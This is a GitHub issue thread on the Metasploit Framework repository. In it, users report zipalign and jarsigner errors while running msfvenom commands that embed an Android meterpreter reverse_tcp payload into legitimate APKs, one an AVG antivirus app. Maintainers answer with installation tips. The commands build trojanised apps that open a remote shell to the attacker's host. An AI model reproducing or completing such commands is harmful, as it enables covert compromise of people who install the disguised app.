### ISSUE TITLE
bug to using apk template

### ISSUE THREAD

**Issue by hacksoldier98** [rapid7/metasploit-framework#7410]
hi is always me and now I have this other problem encountered while trying to enter the payload inside the avg program:
msfvenom -p Android / meterpreter / reverse_tcp Lhost = my-my-ip LPORT = -x port avg-antivirus.apk -o meterpreter.apk
Using APK template: avg-antivirus.apk
No platform was selected, choosing MSF :: Module :: Platform :: Android from the payload
No Arch selected, Selecting Arch: Dalvik from the payload
Error: Zipalign not found. If it's not in your PATH, please add it.

**Comment by bcook-r7** [comment]
'Error: Zipalign not found. If it's not in your PATH, please add it.'

You want to grab the android dev tools and put them in your path for this to work.

**Comment by timwr** [comment]
on ubuntu: `sudo apt install zipalign`

**Comment by hacksoldier98** [comment]
Okay now running thanks

**Comment by bcook-r7** [comment]
coolio

**Comment by Cyphor00** [comment]
hi
I also have this item in this section
I'm having this problem:
msfvenom -x '/root/Desktop/Alireza.apk' -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=4444 -o Ali.apk
Using APK template: /root/Desktop/Alireza.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: jarsigner not found. If it's not in your PATH, please add it.

**Comment by hacksoldier98** [comment]
Hi. You did install jarsigner.

Il 02 Nov 2017 10:38, Cyphor00 <notifications@github.com> ha scritto:

hi
I also have this item in this section
I'm having this problem:
msfvenom -x '/root/Desktop/Alireza.apk' -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=4444 -o Ali.apk
Using APK template: /root/Desktop/Alireza.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: jarsigner not found. If it's not in your PATH, please add it.

**Comment by hunternblz** [comment]
I have problem
Error: jarsigner not found. If it's not in your PATH, please add it.
How To FIX this ?

**Comment by timwr** [comment]
You need to install jarsigner and ensure it's in your path.
e.g make sure the command `jarsigner` works.
You can easily find the answer on Google
